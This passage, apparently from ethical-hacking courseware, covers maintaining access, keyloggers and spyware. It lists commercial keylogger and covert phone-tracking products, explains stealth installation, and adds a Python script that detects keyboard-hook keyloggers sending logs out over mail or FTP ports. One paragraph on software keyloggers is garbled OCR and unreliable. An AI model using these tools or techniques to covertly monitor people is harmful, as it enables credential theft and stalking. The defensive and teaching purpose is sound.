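# Stand-alone demo on the fixture; pass no argument to summarize_cpu_vulns on a live host.
demo() {
    d=$(make_fixture)
    summarize_cpu_vulns "$d"
    echo "still vulnerable: $(count_vulnerable "$d")"
    rm -rf "$d"
}
demo
```

Reading sysfs only tells you what the running kernel believes about itself; it cannot see a microcode or BIOS update that has not been applied yet, which is why the text pairs it with a tool like the checker above and with the manufacturer's firmware updates.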

Figure 6.101: Screenshot of Spectre & Meltdown Checker showing Spectre and Meltdown vulnerabilities
Figure 6.102: Screenshot of Spectre & Meltdown Checker showing Spectre and Meltdown vulnerabilities
Module Flow

Maintaining Access
After gaining access and escalating privileges on the target system, attackers now try to maintain their access for further exploitation of the target system or make the compromised system a launchpad from which to attack other systems remotely in the network. Attackers execute malicious applications such as keyloggers, spyware, and other malicious programs to maintain their access to the target system and steal critical information such as usernames and passwords. Attackers hide their malicious programs or files using rootkits, steganography, NTFS data streams, etc. to maintain their access to the target system.

Executing Applications
Once attackers gain higher privileges in the target system by trying various privilege escalation attempts, they may attempt to execute a malicious application by exploiting a vulnerability to execute arbitrary code. By executing malicious applications, the attacker can steal personal information, gain unauthorized access to system resources, crack passwords, capture screenshots, install a backdoor for maintaining easy access, etc.
Attackers execute malicious applications at this stage in a process called "owning" the system. Once they acquire administrative privileges, they will execute applications. Attackers may even try to do so remotely on the victim's machine to gather the same information as above.
The malicious programs attackers execute on target systems can be:
▪ Backdoors: Program designed to deny or disrupt operation, gather information that leads to exploitation or loss of privacy, or gain unauthorized access to system resources.
▪ Crackers: Components of software or programs designed for cracking a code or passwords.
▪ Keyloggers: These can be hardware or software. In either case, the objective is to record each keystroke made on the computer keyboard.
▪ Spyware: Spy software may capture screenshots and send them to a specified location defined by the hacker. For this purpose, attackers have to maintain access to victims' computers. After deriving all the requisite information from the victim's computer, the attacker installs several backdoors to maintain easy access to it in the future.

Remote Code Execution Techniques
Remote code execution techniques are various tactics that can be used by attackers to execute malicious code on a remote system. These techniques are often performed after compromising a system initially and further expanding access to remote systems present on the target network.
Some examples of remote code execution techniques are as follows:
▪ Exploitation for Client Execution
Insecure coding practices in software can make it vulnerable to various attacks. Attackers can exploit these underlying vulnerabilities in software through focused and targeted exploitations with an objective of arbitrary code execution to maintain access to the target remote system. Different types of exploitations for client execution are as follows:
o Web-Browser-Based Exploitation
Attackers target web browsers through spearphishing links and drive-by compromise. The remote systems can be compromised through normal web browsing or through several users who are targeted victims of spearphishing links to attacker-controlled sites used to exploit the web browser. This type of exploitation does not need user intervention for execution.
o Office-Applications-Based Exploitation
Attackers target common office applications such as Microsoft Office through different variants of spearphishing. Emails containing links to malicious files are directly sent to the end-users for downloading. To run the exploit, end-users are required to open a malicious document or file.
o Third-Party Applications-Based Exploitation
Attackers can also exploit commonly used third-party applications deployed as part of the software. Applications such as Adobe Reader, Flash, etc. are usually targeted by attackers to gain access to remote systems.
▪ Scheduled Task
Scheduled tasks allow users to perform routine tasks chosen for a computer automatically. There are two utilities, at and schtasks, that can be used along with Windows Task Scheduler to execute specific code or script at a scheduled date and time. Using task scheduling, attackers can execute malicious programs at system startup, or schedule it for a specific date and time to maintain access to the target system and further perform remote code execution to gain admin-level privileges to the remote system.
▪ Service Execution
System services are programs that run and operate at the backend of an OS. Attackers run binary files or commands that can communicate with Windows system services such as Service Control Manager. This code execution technique is performed by creating a new service or by modifying an existing service at the time of privilege escalation or maintaining access.
▪ Windows Management Instrumentation (WMI)
WMI is a feature in Windows administration that manages data and operations on Windows OSs and provides a platform for accessing Windows system resources locally and remotely. Attackers can use the WMI feature to interact with the target system remotely, and use it to perform information gathering on system resources and further execute code for maintaining access to the target system.
▪ Windows Remote Management (WinRM)
WinRM is a Windows-based protocol designed to allow a user to run an executable file to modify system services and the registry on a remote system. Attackers can use the winrm command to interact with WinRM and execute a payload on the remote system as a part of lateral movement.

Tools for Executing Applications
Tools used for executing applications remotely help attackers perform various malicious activities on the target systems. After gaining administrative privileges, attackers use these tools to install, execute, delete, and/or modify the restricted resources on the victim machine.
▪ RemoteExec
Source: https://www.isdecisions.com
RemoteExec remotely executes programs/scripts, installs applications, and updates files and folders on Windows systems throughout the network. This allows an attacker to modify the registry, change local admin passwords, disable local accounts, and copy/update/delete files and folders.
As shown in the screenshot, attackers use the RemoteExec tool to remotely execute files by selecting the target OS and the file to be executed.
Figure 6.103: Screenshot of RemoteExec
Some of the privilege escalation tools are listed as follows:
▪ Pupy (https://github.com)
▪ PDQ Deploy (https://www.pdq.com)
▪ Dameware Remote Support (https://www.dameware.com)
▪ ManageEngine Desktop Central (https://www.manageengine.com)
▪ PsExec (https://docs.microsoft.com)

Keylogger
Keyloggers are software programs or hardware devices that record the keys struck on the computer keyboard (also called keystroke logging) of an individual computer user or a network of computers. You can view all the keystrokes of the victim's computer at any time in your system by installing this hardware device or program. It records almost all the keystrokes on a keyboard of a user and saves the recorded information in a text file. As keyloggers hide their processes and interface, the target is unaware of the keylogging. Offices and industries use keyloggers to monitor employees' computer activities, and they can also be used in home environments for parents to monitor children's Internet activities.
Figure 6.104: Demonstration of keylogger
A keylogger, when associated with spyware, helps to transmit a user's information to an unknown third party. Attackers use it illegally for malicious purposes, such as stealing sensitive and confidential information about victims. This sensitive information includes email IDs, passwords, banking details, chat room activity, Internet relay chat (IRC), instant messages, and bank and credit card numbers. The data transmitted over the encrypted Internet connection are also vulnerable to keylogging because the keylogger tracks the keystrokes before encryption.
The keylogger program is installed onto the user's system invisibly through email attachments or "drive-by" downloads when users visit certain websites. Physical keystroke loggers "sit" between keyboard hardware and the OS, so that they can remain undetected and record every keystroke.
A keylogger can:
▪ Record every keystroke typed on the user's keyboard
▪ Capture screenshots at regular intervals, showing user activity such as typed characters or clicked mouse buttons
▪ Track the activities of users by logging Window titles, names of launched applications, and other information
▪ Monitor the online activity of users by recording addresses of the websites visited and keywords entered
▪ Record all login names, bank and credit card numbers, and passwords, including hidden passwords or data displayed in asterisks or blank spaces
▪ Record online chat conversations
▪ Make unauthorized copies of both outgoing and incoming email messages

Types of Keystroke Loggers
A keylogger is a hardware or software program that secretly records each keystroke on the user keyboard at any time. Keyloggers save captured keystrokes to a file for reading later, or transmit them to a place where the attacker can access it. As these programs record all the keystrokes that are provided through a keyboard, they can capture passwords, credit card numbers, email addresses, names, postal addresses, and phone numbers. Keyloggers can capture information before it is encrypted. This gives the attacker access to passphrases and other "well-hidden" information.

There are two types of keystroke loggers: hardware keyloggers and software keyloggers. Both types help attackers to record all keystrokes entered on the target system.
▪ Hardware Keystroke Loggers
Hardware keyloggers are hardware devices that look like normal USB drives. Attackers can connect these keyloggers between a keyboard plug and a USB socket. All the keystrokes by the user are stored in the hardware unit. Attackers retrieve this hardware unit to access the keystrokes that are stored in it. The primary advantage of these loggers is that no anti-spyware, antivirus, or desktop security program can detect them. Their disadvantage is the easy discovery of their physical presence.
There are three main types of hardware keystroke loggers:
o PC/BIOS Embedded
BIOS-level firmware that is responsible for managing keyboard actions can be modified in such a way that it captures the keystrokes that are typed. It requires physical and/or admin-level access to the target computer.

o Keyboard Keylogger
If the hardware circuit is attached to the keyboard cable connector, it can capture the keystrokes. It records all the keyboard strokes to its own internal memory that can be accessed later. The main advantage of a hardware keylogger over a software keylogger is that it is not OS dependent and, hence, will not interfere with any applications running on the target computer, and it is impossible to discover hardware keyloggers by using any anti-keylogger software.
o External Keylogger
External keyloggers are attached between a standard PC keyboard and a computer. They record each keystroke. External keyloggers do not need any software and work with any PC. You can attach one to your target computer and monitor the recorded information on your PC to look through the keystrokes. There are four types of external keyloggers:
• PS/2 and USB Keylogger: This is completely transparent to computer operation and requires no software or drivers for functionality. It records all the keystrokes typed by the user on the computer keyboard, and stores data such as emails, chat records, applications used, IMs, etc.
• Acoustic/CAM Keylogger: Acoustic keyloggers work on the principle of converting electromagnetic sound waves into data. They employ either a capturing receiver capable of converting the electromagnetic sounds into the keystroke data, or a CAM (camera) capable of recording screenshots of the keyboard.
• Bluetooth Keylogger: This requires physical access to the target computer only once, at the time of installation. After installation on the target PC, it stores all the keystrokes and you can retrieve the keystroke information in real-time by connecting via a Bluetooth device.
• Wi-Fi Keylogger: Besides standard PS/2 and USB keylogger functionality, this wireless keylogger features remote access over the Internet. This will connect to a local Wi-Fi access point and send emails containing the recorded keystroke data. You can also connect to the keylogger at any time over TCP/IP and view the captured log.
SoftwareKeystroke
Loggers.
Theseloggers are thesoftwareinstalledremotelyvia a networkor emailattachment i n
a targetsystem for recording Here,the logged
all the keystrokes. informationis stored
as a log
file on a computer harddrive.Thelogger sendskeystroke logsto the attacker
using emailprotocols. Softwareloggers can often obtain additionaldata as well,
because theydo not havethe limitationof physical memory allocation,
as do hardware
keystroke
loggers.
Thereare four typesof softwarekeystroke
loggers:
©. Application
Keylogger
application
‘An keylogger
allowsyou to observeeverything
the user i n his/her
types
emails,chats,
and other applications,
including
passwords.
It is even possible
to
trace recordsof Internet activity. Thisis an invisiblekeylogger to trackand record
everything happening withinthe entire network
* Kernel/Rootkit/Device Driver Keylogger
Attackers rarely use kernel keyloggers because they are difficult to write and require a high level of proficiency from the keylogger developers. These keyloggers exist at the kernel level. Consequently, they are difficult to detect, especially for user-mode applications. This kind of keylogger acts as a keyboard device driver and thus gains access to all information typed on the keyboard.
The rootkit-based keylogger is a forged Windows device driver that records all keystrokes. This keylogger hides from the system and is undetectable, even with standard or dedicated tools.
This kind of keylogger usually acts as a device driver. The device driver keylogger replaces the existing I/O driver with the embedded keylogging functionality. This keylogger saves all the keystrokes performed on the computer into a hidden log file, and then sends the file to the destination through the Internet.
* Hypervisor-Based Keylogger
A hypervisor-based keylogger works within a malware hypervisor operating on the OS.

Ethical Hacking and Countermeasures Copyright © by EC-Council
* Form-Grabbing-Based Keylogger
A form-grabbing-based keylogger records web form data and then submits it over the Internet after bypassing HTTPS encryption. Form-grabbing-based keyloggers log form inputs by recording web browsing events on the "submit" function.
* JavaScript-Based Keylogger
Attackers inject malicious JavaScript tags on the web page of a compromised website to listen to key events such as onKeyUp() and onKeyDown(). Attackers use various techniques such as man-in-the-browser, cross-site scripting, etc. to inject malicious script.
* Memory-Injection-Based Keylogger
Memory-injection-based keyloggers modify the memory tables associated with the web browser and system functions to log keystrokes. Attackers also use this technique to bypass UAC in Windows systems.

Hardware Keyloggers
We now examine the details of external hardware keyloggers. As discussed previously, there are various types of external hardware keyloggers available on the market. These keyloggers are plugged in line between a keyboard and a computer. These types of keyloggers include:
* PS/2 keylogger
* USB keylogger
* Keylogger embedded inside the keyboard
* Bluetooth keylogger
* Wi-Fi keylogger
These keyloggers monitor and capture the keystrokes of the target system. As these external keyloggers attach between a usual PC keyboard and a computer to record each keystroke, they will remain undetectable by the anti-keyloggers installed on the target system. However, the user can easily detect their physical presence.

Figure 6.106: Different types of hardware keyloggers
Hardware keyloggers come from numerous manufacturers and vendors, some of which are discussed as follows:
* KeyGrabber
Source: https://www.keydemon.com
A KeyGrabber hardware keylogger is an electronic device capable of capturing keystrokes from a PS/2 or USB keyboard. It comes in various forms, such as KeyGrabber USB, KeyGrabber PS/2, and KeyGrabber Nano Wi-Fi.


Figure 6.107: Screenshot of KeyGrabber hardware keylogger

Some hardware keyloggers are listed as follows:
* KeyGrabber USB (http://www.keelog.com)
* KeyCarbon (http://www.keycarbon.com)
* Keyllama Keylogger (https://Keyllama.com)
* Keyboard logger (https://www.detective-store.com)
* KeyGhost (http://www.keyghost.com)

Module 6 Page 707
Keyloggers for Windows
Besides the keyloggers mentioned previously, there are many software keyloggers available on the market; you can use these tools to record the keystrokes and monitor the activity of computer users. Some keyloggers are discussed as follows. You can download these tools from their respective websites.
* Spyrix Free Keylogger
Source: http://www.spyrix.com
Spyrix Keylogger Free is used for remote monitoring on a computer that includes recording of keystrokes, passwords, and screenshots. This keylogger is perfectly hidden from antivirus, anti-rootkit, and anti-spyware software.
Attackers use the Spyrix Keylogger Free tool to record all the keystrokes on the victim system from a remote system.

Figure 6.108: Screenshot of Spyrix Keylogger
Some of the keyloggers for Windows are listed as follows:
* REFOG Personal Monitor (https://www.refog.com)
* All In One Keylogger (http://www.relytec.com)
* Elite Keylogger (https://www.elitekeyloggers.com)
* StaffCop Standard (https://www.staffcop.com)
* Spytector (https://www.spytector.com)

Keyloggers for Mac
There are various keyloggers available on the market that run on MacOS. These downloadable tools can assist an attacker in recording keystrokes and monitoring users' activities. They enable you to record everything the user does on the computer, such as keystroke logging, recording email communication, chat messaging, taking screenshots of each activity, and more. The following keystroke loggers are specifically used on MacOS:
* Refog Mac Keylogger
Source: https://www.refog.com
Refog Mac Keylogger provides undetected surveillance and records all the keystrokes on the computer. As shown in the screenshot, the attackers use the Refog Mac Keylogger to record all the activities of the target user and steal critical information such as login credentials.

Figure 6.109: Screenshot of Amac Keylogger
Some of the keyloggers for Mac are listed as follows:
* Spyrix Keylogger For Mac OS (http://www.spyrix.com)
* Elite Keylogger for Mac (https://www.elite-keylogger.net)
* Aobo Mac OS X Keylogger (https://www.easemon.com)
* KidLogger for MAC (http://kidlogger.net)
* Perfect Keylogger for Mac (https://www.blazingtools.com)

Spyware
Spyware propagation (slide summary): drive-by download, piggybacked software installation, web browser vulnerability exploits, cookies.
Spyware is stealthy computer monitoring software that allows you to secretly record all the user activities on a target computer. It automatically delivers logs to the remote attacker using the Internet (via email, FTP, command and control through encrypted traffic, HTTP, DNS, etc.). The delivery logs include information about all areas of the system, such as emails sent, websites visited, every keystroke (including logins/passwords for Gmail, Facebook, Twitter, LinkedIn, etc.), file operations, and online chat conversations. It also takes screenshots at set intervals, just like a surveillance camera aimed at the computer monitor. Spyware is similar to a Trojan horse, which is usually bundled as a hidden component of freeware or software downloaded from the Internet. It hides its process, files, and other objects to avoid detection and removal. This allows an attacker to gather information about a victim or organization, such as email addresses, user logins, passwords, credit card numbers, banking credentials, etc.
* Spyware Propagation
As its name implies, spyware is installed without user knowledge or consent, and this can be accomplished by "piggybacking" the spyware onto other applications. This is possible because spyware uses advertising cookies, which is one of the spyware subclasses. Spyware can also affect your system when you visit a spyware distribution website. Because it installs itself when you visit and click something on a website, this process is known as "drive-by downloading." As a result of normal web surfing or downloading activities, the system may inadvertently become infected with spyware. It can even masquerade as anti-spyware and run on the user's computer without any notice, whenever the user downloads and installs programs that are bundled with spyware.

What Does the Spyware Do?
We have already discussed spyware and its main function of watching user activities on a target computer. We also know that once an attacker succeeds in installing spyware on a victim's computer using the propagation techniques discussed earlier, they can perform several offensive actions to the victim's computer. Therefore, let us now learn more about the capabilities of spyware, as we are now aware of its ability to monitor user activities.
The installed spyware can also help the attacker perform the following on target computers:
* Steals users' personal information and sends it to a remote server or hijacker
* Monitors users' online activity
* Displays annoying pop-ups
* Redirects a web browser to advertising sites
* Changes the browser's default setting and prevents the user from restoring it
* Adds several bookmarks to the browser's favorites list
* Decreases overall system security level
* Reduces system performance and causes software instability
* Connects to remote pornography sites
* Places desktop shortcuts to malicious spyware sites
* Steals your passwords
* Sends you targeted email
* Changes the home page and prevents the user from restoring it
* Modifies the dynamically linked libraries (DLLs) and slows down the browser
* Changes firewall settings
* Monitors and reports websites you visit
Types of Spyware
Today, various spyware programs engage in a variety of offensive tasks, such as changing browser settings, displaying ads, collecting data, etc. Though many spyware applications perform a diverse array of benign activities, ten major types of spyware on the Internet allow attackers to steal information about users and their activities, all without their knowledge or consent.
* Desktop Spyware
Desktop spyware is software that allows an attacker to gain information about a user's activity or personal information, send it via the Internet to third parties without the user's knowledge or consent. It provides information regarding what network users did on their desktops, how, and when. Desktop spyware allows attackers to perform the following:
* Live recording of remote desktops
* Recording and monitoring Internet activities
* Recording software usage and timings
* Recording an activity log and storing it at one centralized location
* Logging users' keystrokes
* Email Spyware
Email spyware is a program that monitors, records, and forwards all incoming and outgoing emails. Once installed on the computer that you want to monitor, this type of spyware records copies of all incoming and outgoing emails and sends them to you through a specified email address or saves the information on the local disk folder of the monitored computer. This works in stealth mode; users will not be aware of the presence of email spyware on their computer. It is also capable of recording instant messages (e.g., AIM, MSN, Yahoo, Myspace, Facebook).
* Internet Spyware
Internet spyware is a tool that allows you to monitor all the web pages accessed by users on your computer in your absence. It makes a chronological record of all visited URLs. This automatically loads at system startup and runs in stealth mode, which means that it runs in the background undetected. The tool records all visited URLs into a log file and sends it to a specified email address. It provides a summary report of overall web usage, such as websites visited, and the time spent on each website, as well as all applications opened along with the date/time of visits. It also allows you to block access to a specific web page or an entire website by specifying the URLs or keywords that you want to be blocked.
* Child-Monitoring Spyware
Child-monitoring spyware allows you to track and monitor what children are doing on the computer, both online and offline. Instead of looking over the child's shoulder, one can use child-monitoring spyware, which works in stealth mode; your children will not be aware of your surveillance. The spyware logs all programs used and websites visited, counts keystrokes and mouse clicks, and captures screenshots of activity. All the recorded data are accessible through a password-protected web interface as a hidden, encrypted file, or can be sent to a specified email address. This also allows you to protect children from accessing inappropriate web content by setting specific keywords that you want to block. It sends a real-time alert to you whenever it encounters the specific keywords on your computer, or whenever your children want to access inappropriate content.

* Screen-Capturing Spyware
Screen-capturing spyware is a program that allows you to monitor computer activities by taking snapshots or screenshots of the computer on which the program is installed. These snapshots are taken locally or remotely at specified time intervals and either saved in a hidden file on the local disk or sent to an email address or FTP site predefined by the attacker.
Screen-capturing spyware is not only capable of taking screenshots, but also captures keystrokes, mouse activity, visited website URLs, and printer activities in real time. The user can install this program or software on networked computers to monitor the activities of all the computers on the network in real time by taking screenshots. This works transparently in stealth mode so that you can monitor computer activities without users' knowledge.
* USB Spyware
USB spyware is a program designed for spying on a computer, which copies spyware files from a USB device onto the hard disk without any request or notification. It runs in hidden mode, so users will not be aware of the spyware or surveillance.
USB spyware provides a multifaceted solution in the province of USB devices, as it can monitor USB devices' activity without creating additional filters, devices, communications, etc. that might damage the structure of the system driver.
USB spyware lets you capture, display, record, and analyze the data transferred between any USB device and the connected PC and its applications. This enables it to work on device drivers or hardware development, thus providing a powerful platform for effective coding, testing, and optimization, and makes it a great tool for debugging software.
It captures all the communications between a USB device and its host and saves it into a hidden file for later review. A detailed log presents a summary of each data transaction, along with its support information. The USB spyware uses a low level of system resources of the host computer. It works with its own timestamp to log all the activities in the communication sequence. USB spyware does not contain any adware or other spyware.
* It works with the most recent variants of Windows.
* USB spyware copies files from USB devices to your hard disk in hidden mode without any request.
* It creates a hidden file/directory with the current date and begins the background copying process.
* It allows you to capture, display, record, and analyze data transferred between any USB device and the connected PC and applications.
* Audio Spyware
Audio spyware is a sound surveillance program designed to record sound onto a computer. The attacker can silently install the spyware on the computer, without the permission of the computer user and without sending them any notification. The audio spyware runs in the background to record discreetly. Using audio spyware does not require any administrative privileges.
Audio spyware monitors and records a variety of sounds on the computer, saving them in a hidden file on the local disk for later retrieval. Therefore, attackers or malicious users use this audio spyware to snoop and monitor conference recordings, phone calls, and radio broadcasts that might contain confidential information.
It can record and spy on voice chat messages within various popular instant messengers. With this audio spyware, people can watch over their employees or children and find out with whom they are communicating. It helps to monitor digital audio devices such as various messengers, microphones, and cell phones. It can record audio conversations by eavesdropping on all incoming and outgoing calls, text messages, etc. It allows live call monitoring, audio surveillance, SMS tracking, call logging, and GPRS tracking.
* Video Spyware
Video spyware is software for video surveillance installed on a target computer without the user's knowledge. All video activity can be recorded according to a programmed schedule. The video spyware runs transparently in the background and secretly monitors and records webcams and video IM conversations. The remote access feature of video spyware allows the attacker to connect to the remote or target system to activate alerts and electric devices, and see recorded images in a video archive or even capture live images from all the cameras connected to the system using a web browser such as Internet Explorer.
* Print Spyware
Attackers can monitor the printer usage of the target organization remotely by using print spyware. Print spyware is printer usage monitoring software that monitors printers in the organization. It provides precise information about print activities for office or local printers, which helps in optimizing printing, saving costs, etc. It records all information related to the printer activities, saves the information in an encrypted log file, and sends the log to a specified email address over the Internet. The log report consists of the exact print job properties, such as the number of pages printed, number of copies, content printed, and date and time at which the print action took place.
Print spyware records the log reports in different formats for various purposes, such as in a web format for sending the reports to an email through the Internet, or in a hidden encrypted format to store on the local disk. The log reports generated will help attackers in analyzing printer activities. The log report shows how many documents each employee or workstation printed, along with the time. This helps in monitoring printer usage and determining how employees are using the printer. This software also allows limiting access to the printer. This log report helps attackers to trace out information about sensitive and secret documents printed.
* Telephone/Cellphone Spyware
Telephone/cellphone spyware is a software tool that gives you full access to monitor a victim's telephone or cellphone. It will completely hide itself from the user of the phone. It will record and log all activity on the phone, such as Internet use, text messages, and phone calls. Then, you can access the logged information via the software's main website, or you can also receive tracking information through SMS or email. Usually, this spyware helps to monitor and track phone usage of employees. However, attackers are using it to trace information from their target person's or organization's telephones/cellphones. Using this spyware does not require any authorized privileges.
The most common telephone/cellphone spyware features include the following:
* Call History: Allows you to view the entire call history of the phone (both incoming and outgoing calls)
* View Text Messages: Enables you to view all incoming and outgoing text messages. It even shows deleted messages in the log report.
* Website History: Records the entire history of all websites visited through the phone in the log report file.
* GPS Tracking: Shows you where the phone is in real time. There is also a log of the cellphone's location so you can see where the phone has been.
It works as depicted in the following diagram.
Figure 6.110: Telephone/cellphone spyware
* GPS Spyware
GPS spyware is a device or software application that uses the Global Positioning System (GPS) to determine the location of a vehicle, person, or other attached or installed asset. An attacker can use this software to track the target person.
This spyware allows you to track the target user location points by logging the phone location points, saves or stores them in a log file and sends them to the specified email address. You can then watch the connected points tracing the phone location history on a map by logging into the specified email address and viewing them. It also sends email notifications of location proximity alerts. An attacker traces the location of the target person using GPS spyware, as shown in the following figure.
[Figure: GPS spyware (satellite, transmission power)]
Spyware Tools
* Spytech SpyAgent
Source: https://www.spytech-web.com
Spytech SpyAgent is computer spy software that allows you to monitor everything users do on your computer, in total secrecy. SpyAgent provides a large array of essential computer monitoring features, as well as website, application, and chat client blocking, logging scheduling, and remote delivery of logs via email or FTP.
As shown in the screenshot, attackers use Spytech SpyAgent to track the websites visited, online searches performed, programs and apps in use, file and printing information, email communication, user login credentials, etc. of the target system.

Figure 6.112: Screenshot of Spytech SpyAgent
* Power Spy
Source: http://ematrixsoft.com
Power Spy is PC-user activity-monitoring software. It runs and performs monitoring secretly in the background of a computer system. It logs all users on the system and users will not be aware of its existence.
As shown in the screenshots, attackers use this tool to monitor the target system and record all user activities, such as screenshots, keystrokes, applications executed, windows opened, websites visited, chat conversations, documents opened, etc.

The following is the list of spyware:
* Desktop and Child-Monitoring Spyware
* ACTIVTrak (https://activtrak.com)
* Veriato Cerebral (http://www.veriato.com)
* NetVizor (https://www.netvizor.net)
* SoftActivity Monitor (https://www.softactivity.com)
* SoftActivity TS Monitor (https://www.softactivity.com)
* USB Spyware
USB spyware monitors and analyzes data transferred between any USB device connected to a computer as well as its applications. It helps in application development, USB device drivers, or hardware development and offers a powerful platform for effective coding, testing, and optimization.
The following is a list of USB spyware:
* USB Analyzer (https://www.eltima.com)
* USB Monitor (https://www.hhdsoftware.com)
* USBDeview (https://www.nirsoft.net)
* Advanced USB Port Monitor (https://www.aggsoft.com)
* USB Monitor Pro (http://www.usb-monitor.com)
* Audio Spyware
Audio spyware helps to monitor sound and voice recorders on the system. It invisibly starts recording once it detects the sound and automatically stops recording when the voice disappears. It can be used in recording conferences, monitoring phone calls, radio broadcasting logs, spying, and employee monitoring, etc.
The following is the list of audio spyware:
* Spy Voice Recorder (http://www.mysuperspy.com)
* Spy Audio Listening Device (https://www.securityplanet.co)
* Spy USB Voice Recorder (https://www.securityplanet.co)
* Voice Activated Flash Drive Voice Recorder (https://www.spytec.com)
* Snooper Audio Spyware (https://www.snooper.se)
* Video Spyware
Video spyware is used for secret video surveillance. An attacker can use this software to secretly monitor and record webcams and video IM conversations. An attacker can use video spyware to remotely view webcams to obtain live footage of secret communication. Using this spyware, attackers can record and replay anything displayed on the victim's screen.
The following is a list of video spyware:
* Movavi Video Editor (https://www.movavi.com)
* Free2x Webcam Recorder (http://www.free2x.com)
* iSpy (https://www.ispyconnect.com)
* NET Video Spy (https://www.sarbash.com)
* Eyeline Video Surveillance Software (https://www.nchsoftware.com)
* Cellphone Spyware
Like Mobile Spy, an attacker can also use the following software programs as telephone/cellphone spyware to record all activities on a phone, such as Internet usage, text messages, and phone calls. Some of the available telephone/cellphone spyware programs are as follows:
* Phone Spy (https://www.phonespysoftware.com)
* XNSPY (https://xnspy.com)
* iKeyMonitor (https://ikeymonitor.com)
* OneSpy (https://www.onespy.in)
* TheTruthSpy (https://thetruthspy.com)
* GPS Spyware
Various software programs act as GPS spyware to trace the location of particular mobile devices. Attackers can also employ the following GPS spyware software to track the location of the target mobile devices. Some examples of GPS spyware programs are listed as follows:
* Spyera (https://spyera.com)
* mSpy (https://www.mspy.com)
* MOBILE SPY (http://www.mobile-spy.com)
* Mobistealth (https://www.mobistealth.com)
* FlexiSPY (https://www.flexispy.com)

How to Defend against Keyloggers
Different countermeasures to defend against keyloggers are listed as follows:
* Use pop-up blockers and avoid opening junk emails.
* Install anti-spyware/antivirus programs and keep the signatures up to date.
* Install professional firewall software and anti-keylogging software.
* Recognize phishing emails and delete them.
* Regularly update and patch system software.
* Do not click on links in unsolicited or dubious emails that may direct you to malicious sites.
* Use keystroke interference software that inserts randomized characters into every keystroke.
* Antivirus and anti-spyware software can detect any installed software, but it is better to detect these programs before installation. Scan the files thoroughly before installing them onto the computer and use a registry editor or process explorer to check for keystroke loggers.
* Use the Windows on-screen keyboard accessibility utility to enter a password or any other confidential information. Use your mouse to enter any information such as passwords and credit card numbers into the fields, by using your mouse instead of typing the passwords with the keyboard. This will ensure that your information is confidential.
* Use an automatic form-filling password manager or a virtual keyboard to enter usernames and passwords, as this will avoid exposure through keyloggers. This automatic form-filling password manager will remove the need to type your personal, financial, or confidential details such as credit card numbers and passwords via the keyboard.
* Keep your hardware systems secure in a locked environment and frequently check the keyboard cables for attached connectors, USB port, and computer games such as the PS2 that may have been used to install keylogger software.
* Use software that frequently scans and monitors changes in your system or network.
* Install a host-based IDS, which can monitor your system and disable the installation of keyloggers.
* Use one-time password (OTP) or other authentication mechanisms such as two-step or multi-step verification to authenticate users.
* Enable application whitelisting to block downloading or installing of unwanted software such as keyloggers.
* Use VPN to enable an additional layer of protection through encryption.
* Use process-monitoring tools to detect suspicious processes and system activities.
* Regularly patch and update software and the OS.
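As an added example that is not part of the courseware, the following Python script applies the process-monitoring and application-whitelisting countermeasures above to a constructed stream of host-monitoring events: it flags processes that register a keyboard hook (WH_KEYBOARD and WH_KEYBOARD_LL are the real Windows hook identifiers an application-level keylogger uses) and then write a hidden file or connect to the FTP/SMTP ports used for log delivery. The JSON event schema, process names and allowlist are assumptions made for this example.

```python
"""Keylogger-behaviour triage over host-monitoring events.

Added example (not part of the CEH courseware). The event schema, the
process names and the allowlist below are assumptions for this example.
"""
import json
from dataclasses import dataclass, field

# Real Windows hook identifiers from WinUser.h. SetWindowsHookEx with one
# of these delivers every keystroke to the caller, which is how most
# application-level (user-mode) keyloggers capture input.
WH_KEYBOARD = 2
WH_KEYBOARD_LL = 13
KEYBOARD_HOOKS = {WH_KEYBOARD, WH_KEYBOARD_LL}

# Destination ports of the log-delivery channels the text names (FTP, SMTP).
EXFIL_PORTS = {21, 25, 465, 587}

# Constructed allowlist: binaries expected to register keyboard hooks
# (input-method editor, on-screen keyboard). Adjust per environment.
ALLOWLIST = {"ctfmon.exe", "osk.exe"}


@dataclass
class Finding:
    pid: int
    image: str
    reasons: list = field(default_factory=list)


def analyze_events(lines, allowlist=ALLOWLIST):
    """Return one Finding per process that shows keylogger-like behaviour.

    A process becomes suspect when it registers a keyboard hook and is
    either not on the allowlist or not signed (an unsigned binary using an
    allowlisted name is treated as masquerading). Later hidden-file writes
    and FTP/SMTP connections by the same pid are attached as evidence.
    Malformed lines are skipped rather than aborting the scan.
    """
    hooked = {}  # pid -> Finding
    for raw in lines:
        try:
            ev = json.loads(raw)
        except json.JSONDecodeError:
            continue
        pid = ev.get("pid")
        image = ev.get("image", "").lower()
        kind = ev.get("event")
        if kind == "SetWindowsHookEx" and ev.get("hook_id") in KEYBOARD_HOOKS:
            if image in allowlist and ev.get("signed", False):
                continue  # expected: signed, allowlisted binary
            finding = hooked.setdefault(pid, Finding(pid, image))
            finding.reasons.append(
                f"keyboard hook {ev['hook_id']} from non-allowlisted or unsigned image")
        elif kind == "FileCreate" and pid in hooked and ev.get("hidden"):
            hooked[pid].reasons.append(
                f"hooked process wrote hidden file {ev.get('path')}")
        elif kind == "NetworkConnect" and pid in hooked and ev.get("dst_port") in EXFIL_PORTS:
            hooked[pid].reasons.append(
                f"hooked process connected to port {ev['dst_port']} (possible log delivery)")
    return list(hooked.values())


# Constructed sample events: a benign signed hook, an unsigned process that
# hooks the keyboard, writes a hidden log and mails it out, an unrelated
# file write, and one malformed line.
SAMPLE_EVENTS = [
    '{"pid": 812, "image": "ctfmon.exe", "signed": true, "event": "SetWindowsHookEx", "hook_id": 13}',
    '{"pid": 4412, "image": "updater.exe", "signed": false, "event": "SetWindowsHookEx", "hook_id": 13}',
    '{"pid": 4412, "image": "updater.exe", "event": "FileCreate", "path": "C:/Users/Public/.kl/keys.log", "hidden": true}',
    '{"pid": 4412, "image": "updater.exe", "event": "NetworkConnect", "dst_port": 587}',
    '{"pid": 2200, "image": "notepad.exe", "event": "FileCreate", "path": "C:/notes.txt", "hidden": false}',
    'not json at all',
]

if __name__ == "__main__":
    for f in analyze_events(SAMPLE_EVENTS):
        print(f"pid {f.pid} ({f.image}):")
        for reason in f.reasons:
            print("  -", reason)
```

Running the block on the sample stream reports only pid 4412 with three reasons; the signed ctfmon.exe hook produces no finding.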
Hardware Keylogger Countermeasures
* Restrict physical access to sensitive computer systems.
* Periodically check your keyboard interface to ensure that no extra components are plugged into the keyboard cable connector.
* Use encryption between the keyboard and its driver.
* Use an anti-keylogger that detects the presence of a hardware keylogger such as KeyGrabber.
* Use an on-screen keyboard and click on it using a mouse.
